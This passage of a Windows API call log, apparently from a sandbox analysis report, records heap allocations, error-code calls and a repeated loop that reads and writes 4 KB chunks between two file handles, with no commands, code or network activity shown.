Flags=0x0, Size=0x78) returned 0x6a9b0 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0091.416] GetLastError () returned 0x0 [0091.416] SetLastError (dwErrCode=0x0) [0091.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0091.416] GetLastError () returned 0x0 [0091.416] SetLastError (dwErrCode=0x0) [0091.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0091.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.416] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0091.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0091.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0091.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0091.655] GetLastError () returned 0x0 [0091.655] SetLastError (dwErrCode=0x0) [0091.655] GetLastError () returned 0x0 [0091.655] SetLastError (dwErrCode=0x0) [0091.655] GetLastError () returned 0x0 [0091.655] SetLastError (dwErrCode=0x0) [0091.655] GetLastError () returned 0x0 [0091.655] SetLastError (dwErrCode=0x0) [0091.655] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.826] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.827] GetLastError () returned 0x0 [0091.827] SetLastError (dwErrCode=0x0) [0091.827] GetLastError () returned 0x0 [0091.827] SetLastError (dwErrCode=0x0) [0091.827] GetLastError () returned 0x0 [0091.828] SetLastError (dwErrCode=0x0) [0091.828] GetLastError () returned 0x0 [0091.828] SetLastError (dwErrCode=0x0) [0091.828] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.828] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.828] GetLastError () returned 0x0 [0091.828] SetLastError (dwErrCode=0x0) [0091.828] GetLastError () returned 0x0 [0091.828] SetLastError (dwErrCode=0x0) [0091.828] GetLastError () returned 0x0 [0091.829] SetLastError (dwErrCode=0x0) [0091.829] GetLastError () returned 0x0 [0091.829] SetLastError (dwErrCode=0x0) [0091.829] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.829] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.829] GetLastError () returned 0x0 [0091.829] SetLastError (dwErrCode=0x0) [0091.829] GetLastError () returned 0x0 [0091.829] SetLastError (dwErrCode=0x0) [0091.829] GetLastError () returned 0x0 [0091.829] SetLastError (dwErrCode=0x0) [0091.829] GetLastError () returned 0x0 [0091.830] SetLastError (dwErrCode=0x0) [0091.830] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.830] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.830] GetLastError () returned 0x0 [0091.830] SetLastError (dwErrCode=0x0) [0091.830] GetLastError () returned 0x0 [0091.830] SetLastError (dwErrCode=0x0) [0091.830] GetLastError () returned 0x0 [0091.830] SetLastError (dwErrCode=0x0) [0091.830] GetLastError () returned 0x0 [0091.830] SetLastError (dwErrCode=0x0) [0091.830] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.831] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.831] GetLastError () returned 0x0 [0091.831] SetLastError (dwErrCode=0x0) [0091.831] GetLastError () returned 0x0 [0091.831] SetLastError (dwErrCode=0x0) [0091.831] GetLastError () returned 0x0 [0091.831] SetLastError (dwErrCode=0x0) [0091.831] GetLastError () returned 0x0 [0091.831] SetLastError (dwErrCode=0x0) [0091.831] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.832] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.832] GetLastError () returned 0x0 [0091.832] SetLastError (dwErrCode=0x0) [0091.832] GetLastError () returned 0x0 [0091.832] SetLastError (dwErrCode=0x0) [0091.832] GetLastError () returned 0x0 [0091.832] SetLastError (dwErrCode=0x0) [0091.832] GetLastError () returned 0x0 [0091.832] SetLastError (dwErrCode=0x0) [0091.832] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.833] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.833] GetLastError () returned 0x0 [0091.833] SetLastError (dwErrCode=0x0) [0091.833] GetLastError () returned 0x0 [0091.833] SetLastError (dwErrCode=0x0) [0091.833] GetLastError () returned 0x0 [0091.833] SetLastError (dwErrCode=0x0) [0091.833] GetLastError () returned 0x0 [0091.833] SetLastError (dwErrCode=0x0) [0091.833] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.833] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.834] GetLastError () returned 0x0 [0091.834] SetLastError (dwErrCode=0x0) [0091.834] GetLastError () returned 0x0 [0091.834] SetLastError (dwErrCode=0x0) [0091.834] GetLastError () returned 0x0 [0091.834] SetLastError (dwErrCode=0x0) [0091.834] GetLastError () returned 0x0 [0091.835] SetLastError (dwErrCode=0x0) [0091.835] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.835] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.835] GetLastError () returned 0x0 [0091.835] SetLastError (dwErrCode=0x0) [0091.835] GetLastError () returned 0x0 [0091.835] SetLastError (dwErrCode=0x0) [0091.835] GetLastError () returned 0x0 [0091.835] SetLastError (dwErrCode=0x0) [0091.836] GetLastError () returned 0x0 [0091.836] SetLastError (dwErrCode=0x0) [0091.836] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.836] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.836] GetLastError () returned 0x0 [0091.836] SetLastError (dwErrCode=0x0) [0091.836] GetLastError () returned 0x0 [0091.836] SetLastError (dwErrCode=0x0) [0091.836] GetLastError () returned 0x0 [0091.836] SetLastError (dwErrCode=0x0) [0091.836] GetLastError () returned 0x0 [0091.837] SetLastError (dwErrCode=0x0) [0091.837] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.837] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.837] GetLastError () returned 0x0 [0091.837] SetLastError (dwErrCode=0x0) [0091.837] GetLastError () returned 0x0 [0091.837] SetLastError (dwErrCode=0x0) [0091.837] GetLastError () returned 0x0 [0091.837] SetLastError (dwErrCode=0x0) [0091.837] GetLastError () returned 0x0 [0091.837] SetLastError (dwErrCode=0x0) [0091.838] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.838] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.838] GetLastError () returned 0x0 [0091.838] SetLastError (dwErrCode=0x0) [0091.838] GetLastError () returned 0x0 [0091.838] SetLastError (dwErrCode=0x0) [0091.838] GetLastError () returned 0x0 [0091.838] SetLastError (dwErrCode=0x0) [0091.838] GetLastError () returned 0x0 [0091.838] SetLastError (dwErrCode=0x0) [0091.838] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.839] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.839] GetLastError () returned 0x0 [0091.839] SetLastError (dwErrCode=0x0) [0091.839] GetLastError () returned 0x0 [0091.839] SetLastError (dwErrCode=0x0) [0091.839] GetLastError () returned 0x0 [0091.839] SetLastError (dwErrCode=0x0) [0091.839] GetLastError () returned 0x0 [0091.839] SetLastError (dwErrCode=0x0) [0091.839] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.839] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.840] GetLastError () returned 0x0 [0091.840] SetLastError (dwErrCode=0x0) [0091.840] GetLastError () returned 0x0 [0091.840] SetLastError (dwErrCode=0x0) [0091.840] GetLastError () returned 0x0 [0091.840] SetLastError (dwErrCode=0x0) [0091.840] GetLastError () returned 0x0 [0091.840] SetLastError (dwErrCode=0x0) [0091.840] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.840] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.841] GetLastError () returned 0x0 [0091.841] SetLastError (dwErrCode=0x0) [0091.841] GetLastError () returned 0x0 [0091.841] SetLastError (dwErrCode=0x0) [0091.841] GetLastError () returned 0x0 [0091.841] SetLastError (dwErrCode=0x0) [0091.841] GetLastError () returned 0x0 [0091.841] SetLastError (dwErrCode=0x0) [0091.841] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.841] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.841] GetLastError () returned 0x0 [0091.842] SetLastError (dwErrCode=0x0) [0091.842] GetLastError () returned 0x0 [0091.842] SetLastError (dwErrCode=0x0) [0091.842] GetLastError () returned 0x0 [0091.842] SetLastError (dwErrCode=0x0) [0091.842] GetLastError () returned 0x0 [0091.842] SetLastError (dwErrCode=0x0) [0091.842] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.842] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.842] GetLastError () returned 0x0 [0091.842] SetLastError (dwErrCode=0x0) [0091.842] GetLastError () returned 0x0 [0091.843] SetLastError (dwErrCode=0x0) [0091.843] GetLastError () returned 0x0 [0091.843] SetLastError (dwErrCode=0x0) [0091.843] GetLastError () returned 0x0 [0091.843] SetLastError (dwErrCode=0x0) [0091.843] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.843] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.843] GetLastError () returned 0x0 [0091.843] SetLastError (dwErrCode=0x0) [0091.843] GetLastError () returned 0x0 [0091.843] SetLastError (dwErrCode=0x0) [0091.843] GetLastError () returned 0x0 [0091.844] SetLastError (dwErrCode=0x0) [0091.844] GetLastError () returned 0x0 [0091.844] SetLastError (dwErrCode=0x0) [0091.844] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.844] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.844] GetLastError () returned 0x0 [0091.844] SetLastError (dwErrCode=0x0) [0091.844] GetLastError () returned 0x0 [0091.844] SetLastError (dwErrCode=0x0) [0091.844] GetLastError () returned 0x0 [0091.844] SetLastError (dwErrCode=0x0) [0091.844] GetLastError () returned 0x0 [0091.845] SetLastError (dwErrCode=0x0) [0091.845] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.845] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.845] GetLastError () returned 0x0 [0091.845] SetLastError (dwErrCode=0x0) [0091.845] GetLastError () returned 0x0 [0091.845] SetLastError (dwErrCode=0x0) [0091.845] GetLastError () returned 0x0 [0091.845] SetLastError (dwErrCode=0x0) [0091.845] GetLastError () returned 0x0 [0091.845] SetLastError (dwErrCode=0x0) [0091.845] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.846] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.846] GetLastError () returned 0x0 [0091.846] SetLastError (dwErrCode=0x0) [0091.846] GetLastError () returned 0x0 [0091.846] SetLastError (dwErrCode=0x0) [0091.846] GetLastError () returned 0x0 [0091.846] SetLastError (dwErrCode=0x0) [0091.846] GetLastError () returned 0x0 [0091.846] SetLastError (dwErrCode=0x0) [0091.846] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.847] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.847] GetLastError () returned 0x0 [0091.847] SetLastError (dwErrCode=0x0) [0091.847] GetLastError () returned 0x0 [0091.847] SetLastError (dwErrCode=0x0) [0091.847] GetLastError () returned 0x0 [0091.847] SetLastError (dwErrCode=0x0) [0091.847] GetLastError () returned 0x0 [0091.847] SetLastError (dwErrCode=0x0) [0091.847] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.848] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.848] GetLastError () returned 0x0 [0091.848] SetLastError (dwErrCode=0x0) [0091.848] GetLastError () returned 0x0 [0091.848] SetLastError (dwErrCode=0x0) [0091.848] GetLastError () returned 0x0 [0091.848] SetLastError (dwErrCode=0x0) [0091.848] GetLastError () returned 0x0 [0091.848] SetLastError (dwErrCode=0x0) [0091.848] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.848] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.849] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.849] GetLastError () returned 0x0 [0091.849] SetLastError (dwErrCode=0x0) [0091.850] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.850] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.850] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] GetLastError () returned 0x0 [0091.850] SetLastError (dwErrCode=0x0) [0091.850] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.851] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.851] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.851] GetLastError () returned 0x0 [0091.851] SetLastError (dwErrCode=0x0) [0091.852] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.852] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.852] GetLastError () returned 0x0 [0091.852] SetLastError (dwErrCode=0x0) [0091.852] GetLastError () returned 0x0 [0091.852] SetLastError (dwErrCode=0x0) [0091.852] GetLastError () returned 0x0 [0091.852] SetLastError (dwErrCode=0x0) [0091.852] GetLastError () returned 0x0 [0091.852] SetLastError (dwErrCode=0x0) [0091.852] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 